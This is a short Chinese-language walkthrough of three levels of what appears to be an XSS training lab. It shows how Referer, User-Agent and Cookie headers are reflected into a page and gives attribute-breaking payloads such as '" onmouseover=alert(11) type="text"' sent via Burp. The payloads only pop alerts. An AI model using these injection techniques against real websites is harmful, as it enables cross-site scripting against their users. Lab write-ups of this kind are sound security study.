level11
分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。
头部本身没有Referer,自行添加了
payload:Referer:" onmouseover=alert(11) type="text"
Referer:" onclick="alert(11)" type="text
level12
查看代码,str11=_SERVER['HTTP_USER_AGENT'];应该是User-Agent的http头部注入,burp抓包,构造头部User-Agent的payload。
payload:
User-Agent:" onmouseover=alert(12) type="text"
User-Agent:" onclick="alert(12)" type="text
level13
查看代码,这次是cookie类型的xss注入,setcookie("user", "call me maybe?", time()+3600);
构造payload:
Cookie:" onmouseover=alert(13) type="text"
Cookie:" onclick="alert(13)" type="text